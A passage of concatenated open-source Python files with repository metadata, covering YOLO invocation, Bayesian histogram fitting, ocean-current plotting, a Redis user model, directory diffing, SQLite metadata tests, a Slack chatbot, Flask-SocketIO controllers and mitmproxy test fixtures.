r"./darknet detector test cfg/coco.data cfg/yolo.cfg yolo.weights /home/zaki/NoooDemo/0001.jpg", shell=True)
except Exception as ex:
print(ex)
finally:
os.chdir(cwd)
print(res)
def main() -> None:
pass
if __name__ == '__main__':
main()
| umyuu/Sample | src/Python3/Q113190/exsample.py | Python | mit | 512 |
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
from loguru import logger
from pathlib import Path
def check_meta_yaml_for_noarch(fn:Path, text=None):
import re
logger.debug("Checking for noarch")
if text is None:
with open(fn, "rt") as fl:
text = fl.read()
mo = re.search(r"\n\s*noarch_python:\s*True", text)
if mo:
logger.info("Detected conda noarch python")
return True
mo = re.search(r"\n\s*noarch:\s*python", text)
if mo:
logger.info("Detected conda noarch python")
return True
return False
| mjirik/discon | discon/discon_tools.py | Python | mit | 600 |
# coding: utf-8
from __future__ import unicode_literals
import re
import os
from django.shortcuts import render
from django.conf import settings
def index(request):
p = re.compile(r'^app\d+_')
apps = (a.split('_') for a in settings.INSTALLED_APPS if p.match(a))
return render(request, 'ignore_me/index.html',
{"apps": sorted(apps), "settings": settings})
| sametmax/Django--an-app-at-a-time | ignore_this_directory/ignore_me/views.py | Python | mit | 391 |
from __future__ import print_function, division, absolute_import
from george import kernels, GP
import numpy as np
from kglib import fitters
from scipy.integrate import quad
from scipy.optimize import minimize
class HistFitter(fitters.Bayesian_LS):
def __init__(self, mcmc_samples, bin_edges):
"""
Histogram Inference a la Dan Foreman-Mackey
Parameters:
===========
- mcmc_samples: numpy array of shape (Nobs, Nsamples)
MCMC samples for the thing you want to histogram
- bin_edges: numpy.ndarray array
The edges of the histogram bins to use.
"""
self.mcmc_samples = mcmc_samples
self.bin_edges = bin_edges
self.bin_centers = (self.bin_edges[:-1] + self.bin_edges[1:]) / 2
self.bin_widths = np.diff(self.bin_edges)
self.Nbins = self.bin_widths.size
self.Nobs = self.mcmc_samples.shape[0]
# Find which bin each q falls in
self.bin_idx = np.digitize(self.mcmc_samples, self.bin_edges) - 1
# Determine the censoring function for each bin (used in the integral)
self.censor_integrals = np.array([quad(func=self.censoring_fcn,
a=left, b=right)[0] for (left, right) in
zip(self.bin_edges[:-1], self.bin_edges[1:])])
# Set values needed for multinest fitting
self.n_params = self.Nbins
self.param_names = [r'$\theta_{}$'.format(i) for i in range(self.Nbins)]
def lnlike(self, pars):
# Pull theta out of pars
theta = pars[:self.Nbins]
# Generate the inner summation
gamma = np.ones_like(self.bin_idx) * np.nan
good = (self.bin_idx < self.Nbins) & (self.bin_idx >= 0) # nans in q get put in nonexistent bins
gamma[good] = self.Nobs * self.censoring_fcn(self.mcmc_samples[good]) * theta[self.bin_idx[good]]
summation = np.nanmean(gamma, axis=1)
# Calculate the integral
I = self._integral_fcn(theta)
# Generate the log-likelihood
ll = -I + np.nansum(np.log(summation))
return ll
def lnprior(self, pars):
""" Override this if you want to set a better prior on the bin heights. """
if all([p > 0 and p < 10 for p in pars]):
return 0
return -np.inf
def lnprob(self, pars):
lp = self.lnprior(pars)
return lp + self.lnlike(pars) if np.isfinite(lp) else -np.inf
def _integral_fcn(self, theta):
return np.sum(theta * self.censor_integrals) * self.Nobs
def censoring_fcn(self, value):
"""
Censoring function. This should return the completeness of your survey to the given value.
"""
return 1.0
def guess_fit(self):
def errfcn(pars):
ll = self.lnprob(pars)
return -ll
initial_guess = np.ones_like(self.bin_centers)
bounds = [[1e-3, None] for p in initial_guess]
out = minimize(errfcn, initial_guess, bounds=bounds)
return out.x
def mnest_prior(self, cube, ndim, nparams):
# All bins are in the range (0, 10)
for i in range(self.Nbins):
cube[i] *= 10
return
class CensoredHistFitter(HistFitter):
"""
Inherits from HistFitter, but actually defines the censoring function
"""
def censoring_fcn(self, val, alpha=40, beta=0.25):
# sigmoid censoring function. Change this for the real deal!
return 1.0 / (1.0 + np.exp(-alpha * (val - beta)))
class SmoothHistFitter(CensoredHistFitter):
"""
A subclass of HistogramFitter that puts a gaussian process smoothing prior on the bin heights
"""
def __init__(self, *args, **kwargs):
super(SmoothHistFitter, self).__init__(*args, **kwargs)
self.smoothing = self.mcmc_samples.shape[0] / self.Nbins
self.n_params = self.Nbins + 4
self.param_names = [r'$\theta_{}$'.format(i) for i in range(self.Nbins)]
self.param_names.extend(('lna', 'lntau', 'lnerr', 'mean'))
def lnprior(self, pars):
"""
Smoothing prior using gaussian process.
We will learn the hyperparameters and marginalize over them.
"""
theta = pars[:self.Nbins]
if np.any(theta < 0):
return -np.inf
a, tau, err = np.exp(pars[self.Nbins:-1])
mean = pars[-1]
kernel = a * kernels.ExpSquaredKernel(tau)
gp = GP(kernel, mean=mean)
gp.compute(self.bin_centers, yerr=err)
return gp.lnlikelihood(theta) / self.smoothing
def guess_fit(self):
"""
This doesn't work too great, but the full MCMC fit looks good.
"""
def errfcn(pars):
ll = self.lnprob(pars)
return -ll
# Set up initial guesses
initial_guess = np.ones(self.bin_centers.size + 4)
initial_guess[-4] = 0.0
initial_guess[-3] = -0.25
initial_guess[-2] = -1.0
initial_guess[-1] = -1.0
# Set up bounds
bounds = [[1e-3, None] for p in self.bin_centers]
bounds.append([-10, 20])
bounds.append([-10, 10])
bounds.append((-1, 5))
bounds.append((-10, 10))
# Minimize
out = minimize(errfcn, initial_guess, bounds=bounds)
return out.x
def _lnlike(self, pars):
return self.lnprob(pars)
def mnest_prior(self, cube, ndim, nparams):
for i in range(self.Nbins):
cube[i] *= 10
cube[self.Nbins] = cube[self.Nbins] * 30 - 10
cube[self.Nbins + 1] = cube[self.Nbins + 1] * 20 - 10
cube[self.Nbins + 2] = cube[self.Nbins + 2] * 7 - 2
cube[self.Nbins + 3] = cube[self.Nbins + 3] * 20 - 10
return | kgullikson88/gullikson-scripts | kglib/fitters/histogram.py | Python | mit | 5,838 |
# ------------------------------------------------------
# current.py
#
# Plot a current field at fixed depth
# Modified from the spermplot example
#
# Bjørn Ådlandsvik <[email protected]>
# 2020-03-27
# ------------------------------------------------------
# -------------
# Imports
# -------------
import numpy as np
import matplotlib.pyplot as plt
from netCDF4 import Dataset
from roppy import SGrid
from roppy.mpl_util import landmask
from roppy.trajectories import curly_vectors
# -------------------------
# User settings
# ------------------------
ncfile = "data/ocean_avg_example.nc"
timeframe = 3 # Fourth time frame
# subgrid = (1,-1,1,-1) # whole grid except boundary cells
subgrid = (110, 170, 35, 90)
# Depth level [m]
z = 25
# Distance between vectors
stride = 2
# Speed level (isotachs)
speedlevels = np.linspace(0, 0.5, 6) # 0.0, 0.1, ...., 0.5
# Colormap for speed
speedcolors = "YlOrRd"
# --------------------
# Read the data
# --------------------
f = Dataset(ncfile)
grid = SGrid(f, subgrid=subgrid)
# Read 3D current for the subgrid
U0 = f.variables["u"][timeframe, :, grid.Ju, grid.Iu]
V0 = f.variables["v"][timeframe, :, grid.Jv, grid.Iv]
Mu = f.variables["mask_u"][grid.Ju, grid.Iu]
Mv = f.variables["mask_v"][grid.Jv, grid.Iv]
# f.close()
# ----------------------
# Handle the data
# ----------------------
# Interpolate to rho-points
U1 = 0.5 * (U0[:, :, :-1] + U0[:, :, 1:])
V1 = 0.5 * (V0[:, :-1, :] + V0[:, 1:, :])
# Interpolate to correct depth level
U = grid.zslice(U1, z)
V = grid.zslice(V1, z)
# Remove velocity at land and below bottom
U[grid.h < z] = np.nan
V[grid.h < z] = np.nan
# Compute the current speed
Speed = np.sqrt(U * U + V * V)
# Impose the stride
X = grid.X[::stride]
Y = grid.Y[::stride]
U = U[::stride, ::stride]
V = V[::stride, ::stride]
# --------------------
# Make the plot
# --------------------
# Contour plot of current speed
plt.contourf(grid.X, grid.Y, Speed, levels=speedlevels, cmap=speedcolors)
plt.colorbar()
# Make the vector plot
plt.quiver(X, Y, U, V, width=0.003)
# Plot green land mask
landmask(grid, "LightGreen")
# Set correct aspect ratio and axis limits
plt.axis("image")
plt.axis((grid.i0 + 0.5, grid.i1 - 1.5, grid.j0 + 0.5, grid.j1 - 1.5))
# Display the plot
plt.show()
| bjornaa/roppy | examples/plot_current25.py | Python | mit | 2,273 |
from __init__ import redis_db
from werkzeug.security import generate_password_hash, check_password_hash
from os import urandom
from base64 import b64encode
class User(object):
def __init__(self):
self.username = "" # required
self.password_hash = "" # required
self.phone_number = "" # required
self.emergency_contact = "" # not required
self.secret_key = b64encode(urandom(64)).decode("utf-8")
self.contacts = set() # can be empty
def set_password(self, password):
self.password_hash = generate_password_hash(password, method="pbkdf2:sha256", salt_length=32)
def verify_password(self, password):
return check_password_hash(self.password_hash, password)
def write_to_db(self):
user_dict = {"password_hash": self.password_hash, "phone_number": self.phone_number,
"secret_key": self.secret_key, "emergency_contact": self.emergency_contact}
redis_db.hmset(self.username, user_dict)
redis_db.delete(self.username + ":contacts")
if len(self.contacts):
redis_db.sadd(self.username + ":contacts", *self.contacts)
def deauthenticate(self):
self.secret_key = b64encode(urandom(64)).decode("utf-8")
@classmethod
def get_from_db(cls, username):
user_dict = redis_db.hmget(username, ["password_hash", "phone_number", "secret_key", "emergency_contact"])
fetched_user = User()
fetched_user.username = username
fetched_user.password_hash = user_dict[0]
fetched_user.phone_number = user_dict[1]
fetched_user.secret_key = user_dict[2]
fetched_user.emergency_contact = user_dict[3]
if not fetched_user.password_hash or not fetched_user.phone_number or not fetched_user.secret_key:
return None
else:
fetched_user.contacts = redis_db.smembers(fetched_user.username + ":contacts")
return fetched_user
| BrambleLLC/HackAZ-2016 | server/webapp/models.py | Python | mit | 1,957 |
import functions
import heapq
import vtbase
### Classic stream iterator
registered = True
class StreamExcept(vtbase.VT):
def BestIndex(self, constraints, orderbys):
return (None, 0, None, True, 1000)
def VTiter(self, *parsedArgs, **envars):
largs, dictargs = self.full_parse(parsedArgs)
if len(largs) < 1:
raise functions.OperatorError(__name__.rsplit('.')[-1], "Not defined union tables ")
streams = str(largs[0]).split(",")
if len(streams) < 2:
raise functions.OperatorError(__name__.rsplit('.')[-1], "Union tables must be more than one ")
cursors = []
execs = []
for stream in streams:
cursors.append(envars['db'].cursor())
execs.append(cursors[-1].execute("select * from " + str(stream) + ";"))
comparedcursor = str(cursors[0].getdescriptionsafe())
# for cursor in cursors:
# if str(cursor.getdescriptionsafe()) != comparedcursor:
# raise functions.OperatorError(__name__.rsplit('.')[-1],"Union tables with different schemas ")
if 'cols' in dictargs:
try:
cols = int(dictargs['cols'])
except ValueError:
try:
cols = [y[0] for y in cursors[0].getdescriptionsafe()].index(dictargs['cols'])
except ValueError:
raise functions.OperatorError(__name__.rsplit('.')[-1], "Column name does not exists ")
else:
cols = 0
if cols >= len(cursors[0].getdescriptionsafe()):
raise functions.OperatorError(__name__.rsplit('.')[-1], "Column position does not exists ")
for x in range(0, len(streams)):
if x is 0:
execs[0] = ((v[cols], (0,) + v) for v in execs[0])
elif x is 1:
execs[1] = ((v[cols], (1,) + v) for v in execs[1])
elif x is 2:
execs[2] = ((v[cols], (2,) + v) for v in execs[2])
elif x is 3:
execs[3] = ((v[cols], (3,) + v) for v in execs[3])
elif x is 4:
execs[4] = ((v[cols], (4,) + v) for v in execs[4])
try:
yield list(cursors[0].getdescriptionsafe())
except StopIteration:
try:
raise
finally:
try:
for cur in cursors:
cur.close()
except:
pass
currentgroup = None
lists = [[]] * len(streams)
for k, v in heapq.merge(*execs):
if currentgroup is None or currentgroup != k:
unionset = set().union(*lists[1:])
for t in (set(lists[0]) - unionset):
yield t
lists = [[]] * len(streams)
lists[v[0]] = lists[v[0]] + [tuple(v[1:])]
currentgroup = k
unionset = set().union(*lists[1:])
for t in list(set(lists[0]) - unionset):
yield t
def Source():
return vtbase.VTGenerator(StreamExcept)
if not ('.' in __name__):
"""
This is needed to be able to test the function, put it at the end of every
new function you create
"""
import sys
from functions import *
testfunction()
if __name__ == "__main__":
reload(sys)
sys.setdefaultencoding('utf-8')
import doctest
doctest.testmod()
| madgik/exareme | Exareme-Docker/src/exareme/exareme-tools/madis/src/functions/vtable/streamexcept.py | Python | mit | 3,449 |
import json, logging, os, re, subprocess, shlex
from tools import get_category_by_status
log = logging.getLogger()
meta_files = ['Disassembly', 'Stacktrace', 'Registers',
'SegvAnalysis', 'ProcMaps', "BootLog" , "CoreDump",
"BootDmesg", "syslog", "UbiquityDebug.gz", "Casper.gz",
"UbiquityPartman.gz", "UbiquityDm.gz", "GdmLog", "XorgLog"
"log", "Log"]
def get(metadata, bugdir):
indicators = {}
# look for file arg; this needs work TODO
cmdline = None
uri = None
for line in metadata['description'].splitlines():
if "proccmdline" in line.lower():
cmdline = ":".join(line.split(":")[1:]).strip()
try:
toks = shlex.split(cmdline)
except ValueError as e:
log.error("error while parsing cmdline: %s" % cmdline)
log.exception(e)
continue
if len(toks) > 1:
if ("//" in toks[-1]) or ("." in toks[-1]):
uri = toks[-1].strip()
indicators['cmdline'] = cmdline
indicators['cmdline_uri'] = uri
# look for interesting attachments; ugly
interesting_files = []
for f in os.listdir(bugdir):
fpath = os.path.join(bugdir, f)
if not os.path.isfile(fpath):
continue
for fn in meta_files:
if fn.lower() in f.lower():
break
else:
# no break in loop above, i.e. still interested
out = subprocess.check_output(["file", fpath])
ftype = out.split(":")[-1]
if ftype.strip() == "empty":
continue
for tstr in ["ASCII", "text", "core file"]:
if tstr in ftype:
break
else:
# only runs if we didn't break, i.e., this might be interesting
interesting_files.append(f)
indicators['files'] = interesting_files
# TODO: look for recv, etc. in stacks (shoudl this be in exploitability maybe (remote?))
return indicators
| jfoote/vulture | vlib/analyzers/reproducibility.py | Python | mit | 2,072 |
import hashlib
import os
import sys
if len(sys.argv) < 3: #1
print("You need to specify two directories:") #1
print(sys.argv[0], "<directory 1> <directory 2>") #1
sys.exit() #1
directory1 = sys.argv[1] #2
directory2 = sys.argv[2] #2
print("Comparing:")
print(directory1)
print(directory2)
for directory in [directory1, directory2]:
if not os.access(directory, os.F_OK):
print(directory, "is not a valid directory!")
sys.exit()
def md5(file_path):
read_file = open(file_path, "rb")
the_hash = hashlib.md5()
for line in read_file.readlines():
the_hash.update(line)
return the_hash.hexdigest()
def directory_listing(directory_name):
dir_file_list = {}
dir_root = None
dir_trim = 0
for path, dirs, files in os.walk(directory_name):
if dir_root is None:
dir_root = path
dir_trim = len(dir_root)
print("dir", directory_name, end=' ')
print("root is", dir_root)
trimmed_path = path[dir_trim:]
if trimmed_path.startswith(os.path.sep):
trimmed_path = trimmed_path[1:]
#print "path is", path, " and trimmed_path is", trimmed_path
for each_file in files:
file_path = os.path.join(trimmed_path, each_file)
dir_file_list[file_path] = True
return (dir_file_list, dir_root)
dir1_file_list, dir1_root = directory_listing(directory1)
dir2_file_list, dir2_root = directory_listing(directory2)
results = {}
for file_path in list(dir2_file_list.keys()):
if file_path not in dir1_file_list:
results[file_path] = "not found in directory 1"
else:
#print file_path, "found in directory 1 and 2"
file1 = os.path.join(dir1_root, file_path)
file2 = os.path.join(dir2_root, file_path)
if md5(file1) != md5(file2):
results[file_path] = "is different in directory 2"
else:
results[file_path] = "is the same in both"
for file_path, value in list(dir1_file_list.items()):
if file_path not in results:
results[file_path] = "not found in directory 2"
print()
for path, result in sorted(results.items()):
if os.path.sep not in path and "same" not in result:
print(path, result)
for path, result in sorted(results.items()):
if os.path.sep in path and "same" not in result:
print(path, result)
| AnthonyBriggs/Python-101 | hello_python_source_py3/chapter 03/difference_engine_5_inorder.py | Python | mit | 2,533 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
本测试模块用于测试与 :class:`sqlite4dummy.schema.MetaData` 有关的方法
class, method, func, exception
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"""
from sqlite4dummy import *
from sqlite4dummy.tests.basetest import *
from datetime import datetime, date
import unittest
class MetaDataUnittest(unittest.TestCase):
"""Unittest of :class:`sqlite4dummy.schema.MetaData`.
MetaData的方法的单元测试。
"""
def setUp(self):
self.engine = Sqlite3Engine(":memory:", autocommit=False)
self.metadata = MetaData()
self.int_ = 1
self.float_ = 3.14
self.str_ = r"""\/!@#$%^&*()_+-=~`|[]{}><,.'"?"""
self.bytes_ = "abc".encode("utf-8")
self.date_ = date(2000, 1, 1)
self.datetime_ = datetime(2015, 10, 1, 18, 30, 0, 123)
self.pickle_ = [1, 2, 3]
self.test = Table("test", self.metadata,
Column("_id", dtype.INTEGER, primary_key=True, nullable=False),
Column("_int_with_default", dtype.INTEGER, default=self.int_),
Column("_float_with_default", dtype.REAL, default=self.float_),
Column("_str_with_default", dtype.TEXT, default=self.str_),
Column("_bytes_with_default", dtype.BLOB, default=self.bytes_),
Column("_date_with_default", dtype.DATE, default=self.date_),
Column("_datetime_with_default", dtype.DATETIME, default=self.datetime_),
Column("_pickle_with_default", dtype.PICKLETYPE, default=self.pickle_),
Column("_int", dtype.INTEGER),
Column("_float", dtype.REAL),
Column("_str", dtype.TEXT),
Column("_bytes", dtype.BLOB),
Column("_date", dtype.DATE),
Column("_datetime", dtype.DATETIME),
Column("_pickle", dtype.PICKLETYPE),
)
self.metadata.create_all(self.engine)
self.index = Index("test_index", self.metadata,
[self.test.c._int,
self.test.c._float.desc(),
self.test.c._date,
desc(self.test.c._datetime)],
table_name=self.test,
unique=True,
skip_validate=False,
)
self.index.create(self.engine)
self.assertEqual(
len(self.engine.execute("PRAGMA table_info(test);").fetchall()),
15,
)
self.assertEqual(
len(self.engine.execute(
"SELECT * FROM sqlite_master "
"WHERE type = 'index' AND sql NOT NULL;").fetchall()),
1,
)
def tearDown(self):
self.engine.close()
def test_drop_all(self):
"""测试drop_all是否能drop所有的表。
"""
self.assertEqual(
len(self.engine.execute(
"SELECT * FROM sqlite_master WHERE type = 'table';").fetchall()),
1,
)
self.metadata.drop_all(self.engine)
self.assertEqual(
len(self.engine.execute(
"SELECT * FROM sqlite_master WHERE type = 'table';").fetchall()),
0,
)
self.assertEqual(len(self.metadata.t), 0) # 没有表了
def test_str_repr(self):
# print(self.metadata)
# print(repr(self.metadata))
pass
def test_get_table(self):
"""测试MetaData.get_table(table)方法是否能正确获得Table。
"""
self.assertEqual(self.metadata.get_table("test"), self.test)
self.assertRaises(KeyError,
self.metadata.get_table, "not_existing_table")
def test_get_index(self):
"""测试MetaData.get_index(index)方法是否能正确获得Index。
"""
self.assertEqual(self.metadata.get_index("test_index"), self.index)
self.assertRaises(KeyError,
self.metadata.get_index, "not_existing_index")
def test_reflect(self):
"""测试MetaData.reflect(engine)是否能正确解析出Table, Column, Index的
metadata, 并且解析出Column的default值。
"""
second_metadata = MetaData()
second_metadata.reflect(self.engine,
pickletype_columns=[
"test._pickle_with_default",
"test._pickle",
])
self.assertEqual(second_metadata.get_table("test").\
c._int_with_default.default, self.int_)
self.assertEqual(second_metadata.get_table("test").\
c._float_with_default.default, self.float_)
self.assertEqual(second_metadata.get_table("test").\
c._str_with_default.default, self.str_)
self.assertEqual(second_metadata.get_table("test").\
c._bytes_with_default.default, self.bytes_)
self.assertEqual(second_metadata.get_table("test").\
c._date_with_default.default, self.date_)
self.assertEqual(second_metadata.get_table("test").\
c._datetime_with_default.default, self.datetime_)
self.assertEqual(second_metadata.get_table("test").\
c._pickle_with_default.default, self.pickle_)
self.assertEqual(second_metadata.get_index("test_index").\
index_name, "test_index")
self.assertEqual(second_metadata.get_index("test_index").\
table_name, "test")
self.assertEqual(second_metadata.get_index("test_index").\
unique, True)
self.assertEqual(second_metadata.get_index("test_index").\
params, self.index.params)
if __name__ == "__main__":
unittest.main() | MacHu-GWU/sqlite4dummy-project | sqlite4dummy/tests/functionality/test_MetaData.py | Python | mit | 5,883 |
#!/usr/bin/env python
# https://www.codeeval.com/open_challenges/1/
import sys
def solve(X, Y, N):
r = []
for i in range(1, N + 1):
if i % X == 0 and i % Y == 0:
r.append('FB')
elif i % X == 0:
r.append('F')
elif i % Y == 0:
r.append('B')
else:
r.append(str(i))
print ' '.join(r)
def main():
for line in sys.stdin:
(X, Y, N) = line.strip().split(' ')
solve(int(X), int(Y), int(N))
if __name__ == '__main__':
main()
| guozengxin/codeeval | easy/fizzBuzz.py | Python | mit | 537 |
import ConfigParser
import sys, traceback
from slackclient import SlackClient
from chatterbot import ChatBot
import os
from os import listdir
from os.path import isfile, join
from chatterbot.trainers import ChatterBotCorpusTrainer
config = ConfigParser.SafeConfigParser({"host": "searchhub.lucidworks.com", "port":80})
config.read('config.cfg')
token = config.get("Slack", "token") # found at https://api.slack.com/web#authentication
channel_str = config.get("Slack", "channels")
channel_names = []
if channel_str:
#print (channel_str)
channels = channel_str.split(",")
for channel in channels:
#print channel
channel_names.append(channel)
storage = config.get("Chatterbot", "storage_dir")
if not os.path.exists(storage):
os.makedirs(storage)
bot_name = config.get("Slack", "bot_name")
print "Starting Slack"
sc = SlackClient(token)
print "Starting Chatterbot"
chatbot = ChatBot(bot_name, storage_adapter="chatterbot.adapters.storage.JsonDatabaseAdapter",
logic_adapters=[
"chatterbot.adapters.logic.MathematicalEvaluation",
"chatterbot.adapters.logic.TimeLogicAdapter",
"chatterbot.adapters.logic.ClosestMeaningAdapter",
"adapters.SearchHubLogicAdapter"
],
searchhub_host=config.get("SearchHub", "host"),
searchhub_port=config.get("SearchHub", "port"),
input_adapter="adapters.SlackPythonInputAdapter",
output_adapter="adapters.SlackPythonOutputAdapter",
database=storage + "/database.json",
slack_client=sc,
slack_channels=channel_names,
slack_output_channel=config.get("Slack", "output_channel"),
slack_bot_name=bot_name
)
chatbot.set_trainer(ChatterBotCorpusTrainer)
training_dir = "training"
files = [f for f in listdir(training_dir) if isfile(join(training_dir, f)) and f.endswith(".json") and f.find("example.json") == -1]
for file in files:
print "Training on " + file
chatbot.train("training." + file.replace(".json", ""))
# Train based on english greetings corpus
chatbot.train("chatterbot.corpus.english")
# Train based on the english conversations corpus
#chatbot.train("chatterbot.corpus.english.conversations")
print "Starting Chatbot"
while True:
try:
bot_input = chatbot.get_response(None)
except(Exception):
print "Exception"
traceback.print_exc(Exception)
| gsingers/rtfmbot | src/python/run.py | Python | mit | 2,559 |
"""
filename: controllers.py
description: Controllers for committee notes.
created by: Chris Lemelin ([email protected])
created on: 04/20/18
"""
from flask_socketio import emit
from app.decorators import ensure_dict
from app import socketio, db
from app.committee_notes.models import *
from app.committees.models import *
from app.users.models import Users
from app.committee_notes.committee_notes_response import Response
##
## @brief Creates a committee note. (Must be admin user or committe head)
##
## @param user_data The user data required to create a committee note
##
## All the following fields are required:
## committee - id of the committee
## description - Description of new committee note
##
@socketio.on('create_committee_note')
@ensure_dict
def create_note(user_data):
user = Users.verify_auth(user_data.get("token", ""))
committe_id = user_data.get('committee', '')
committee = Committees.query.filter_by(id=committe_id).first()
if committee is not None:
if(user is not None and (user.is_admin or committee.head == user.id)):
committee_note = CommitteeNotes()
committee_note.committee = committee.id
committee_note.description = user_data.get('description',"")
committee_note.author = user.id
committee_note.hidden = False
db.session.add(committee_note)
try:
db.session.commit()
emit('create_committee_note', Response.AddSuccess)
get_notes(action.id, broadcast = True)
except Exception as e:
db.session.rollback()
db.session.flush()
emit("create_committee_note", Response.AddError)
else:
emit("create_committee_note", Response.UsrNotAuth)
else:
emit("create_committee_note", Response.CommitteeDoesntExist)
##
## @brief Gets committee notes from a committee
##
## @param committee_id - id of the committee
##
@socketio.on('get_committee_notes')
def get_notes(committee_id, broadcast = False):
notes = CommitteeNotes.query.filter_by(committee= committee_id).all()
note_ser = [
{
"id": c.id,
"author": c.author,
"committee": c.committee,
"description": c.description,
"created_at": c.created_at,
"hidden": c.hidden
}
for c in notes
]
emit("get_committee_notes", note_ser, broadcast = broadcast)
##
## @brief Gets a committee note
##
## @param id - id of committee note.
##
@socketio.on('get_committee_note')
def get_note(id, broadcast = False):
note = CommitteeNotes.query.filter_by(id= id).first()
if note is not None:
note_data = {
"id": note.id,
"author": note.author,
"committee": note.committee,
"description": note.description,
"created_at": note.created_at,
"hidden": note.hidden
}
emit('get_committee_note', note_data, broadcast = broadcast)
else:
emit("get_committee_note", {}, broadcast = broadcast)
##
## @brief Edits a committee note (Must be admin user or committe head to hide,
## only the author can edit the description)
##
## @param user_data The user data to edit a note, must
## contain a token, an id and any of the following
## fields:
## - description
## - hidden
##
## Any other field will be ignored.
##
## @emit Emits a success mesage if edited, errors otherwise.
##
@socketio.on('modify_committee_note')
@ensure_dict
def modify_note(user_data):
user = Users.verify_auth(user_data.get("token",""))
if(user is None):
emit('modify_note', Response.UsrDoesntExist)
return
committee_note_id = user_data.get("id","")
committee_note = CommitteeNotes.query.filter_by(id=committee_note_id).first()
if(committee_note is None):
emit('modify_note', Response.CommitteeNoteDoesntExist)
return
committee = Committees.query.filter_by(id= committee_note.committee).first()
if(user.id == committee_note.author):
if "description" in user_data:
committee_note.description = user_data['description']
if(user.id == committee.head or user.is_admin or user.id == committee_note.author):
if "hidden" in user_data:
committee_note.hidden = user_data['hidden']
db.session.add(committee_note)
try:
db.session.commit()
emit('modify_committee_note', Response.ModifySuccess)
#get_note(committee_note.id, broadcast = True)
except Exception as e:
db.session.rollback()
db.session.flush()
emit("modify_committee_note", Response.ModifyError)
else:
emit("modify_committee_note", Response.UsrNotAuth)
| ritstudentgovernment/chargeflask | app/committee_notes/controllers.py | Python | mit | 5,203 |
import uuid
from typing import Optional, Union
from mitmproxy import connection
from mitmproxy import flow
from mitmproxy import http
from mitmproxy import tcp
from mitmproxy import websocket
from mitmproxy.test.tutils import treq, tresp
from wsproto.frame_protocol import Opcode
def ttcpflow(client_conn=True, server_conn=True, messages=True, err=None) -> tcp.TCPFlow:
if client_conn is True:
client_conn = tclient_conn()
if server_conn is True:
server_conn = tserver_conn()
if messages is True:
messages = [
tcp.TCPMessage(True, b"hello", 946681204.2),
tcp.TCPMessage(False, b"it's me", 946681204.5),
]
if err is True:
err = terr()
f = tcp.TCPFlow(client_conn, server_conn)
f.messages = messages
f.error = err
f.live = True
return f
def twebsocketflow(messages=True, err=None, close_code=None, close_reason='') -> http.HTTPFlow:
flow = http.HTTPFlow(tclient_conn(), tserver_conn())
flow.request = http.Request(
"example.com",
80,
b"GET",
b"http",
b"example.com",
b"/ws",
b"HTTP/1.1",
headers=http.Headers(
connection="upgrade",
upgrade="websocket",
sec_websocket_version="13",
sec_websocket_key="1234",
),
content=b'',
trailers=None,
timestamp_start=946681200,
timestamp_end=946681201,
)
flow.response = http.Response(
b"HTTP/1.1",
101,
reason=b"Switching Protocols",
headers=http.Headers(
connection='upgrade',
upgrade='websocket',
sec_websocket_accept=b'',
),
content=b'',
trailers=None,
timestamp_start=946681202,
timestamp_end=946681203,
)
flow.websocket = twebsocket()
flow.websocket.close_reason = close_reason
if close_code is not None:
flow.websocket.close_code = close_code
else:
if err is True:
# ABNORMAL_CLOSURE
flow.websocket.close_code = 1006
else:
# NORMAL_CLOSURE
flow.websocket.close_code = 1000
flow.live = True
return flow
def tflow(
*,
client_conn: Optional[connection.Client] = None,
server_conn: Optional[connection.Server] = None,
req: Optional[http.Request] = None,
resp: Union[bool, http.Response] = False,
err: Union[bool, flow.Error] = False,
ws: Union[bool, websocket.WebSocketData] = False,
live: bool = True,
) -> http.HTTPFlow:
"""Create a flow for testing."""
if client_conn is None:
client_conn = tclient_conn()
if server_conn is None:
server_conn = tserver_conn()
if req is None:
req = treq()
if resp is True:
resp = tresp()
if err is True:
err = terr()
if ws is True:
ws = twebsocket()
assert resp is False or isinstance(resp, http.Response)
assert err is False or isinstance(err, flow.Error)
assert ws is False or isinstance(ws, websocket.WebSocketData)
f = http.HTTPFlow(client_conn, server_conn)
f.request = req
f.response = resp or None
f.error = err or None
f.websocket = ws or None
f.live = live
return f
class DummyFlow(flow.Flow):
"""A flow that is neither HTTP nor TCP."""
def __init__(self, client_conn, server_conn, live=None):
super().__init__("dummy", client_conn, server_conn, live)
def tdummyflow(client_conn=True, server_conn=True, err=None) -> DummyFlow:
if client_conn is True:
client_conn = tclient_conn()
if server_conn is True:
server_conn = tserver_conn()
if err is True:
err = terr()
f = DummyFlow(client_conn, server_conn)
f.error = err
f.live = True
return f
def tclient_conn() -> connection.Client:
c = connection.Client.from_state(dict(
id=str(uuid.uuid4()),
address=("127.0.0.1", 22),
mitmcert=None,
tls_established=True,
timestamp_start=946681200,
timestamp_tls_setup=946681201,
timestamp_end=946681206,
sni="address",
cipher_name="cipher",
alpn=b"http/1.1",
tls_version="TLSv1.2",
tls_extensions=[(0x00, bytes.fromhex("000e00000b6578616d"))],
state=0,
sockname=("", 0),
error=None,
tls=False,
certificate_list=[],
alpn_offers=[],
cipher_list=[],
))
return c
def tserver_conn() -> connection.Server:
c = connection.Server.from_state(dict(
id=str(uuid.uuid4()),
address=("address", 22),
source_address=("address", 22),
ip_address=("192.168.0.1", 22),
timestamp_start=946681202,
timestamp_tcp_setup=946681203,
timestamp_tls_setup=946681204,
timestamp_end=946681205,
tls_established=True,
sni="address",
alpn=None,
tls_version="TLSv1.2",
via=None,
state=0,
error=None,
tls=False,
certificate_list=[],
alpn_offers=[],
cipher_name=None,
cipher_list=[],
via2=None,
))
return c
def terr(content: str = "error") -> flow.Error:
err = flow.Error(content, 946681207)
return err
def twebsocket(messages: bool = True) -> websocket.WebSocketData:
ws = websocket.WebSocketData()
if messages:
ws.messages = [
websocket.WebSocketMessage(Opcode.BINARY, True, b"hello binary", 946681203),
websocket.WebSocketMessage(Opcode.TEXT, True, b"hello text", 946681204),
websocket.WebSocketMessage(Opcode.TEXT, False, b"it's me", 946681205),
]
ws.close_reason = "Close Reason"
ws.close_code = 1000
ws.closed_by_client = False
ws.timestamp_end = 946681205
return ws
| mitmproxy/mitmproxy | mitmproxy/test/tflow.py | Python | mit | 5,859 |
from django.test import Client
import mock as mock
from image_converter.tests.base import ImageConversionBaseTestCase
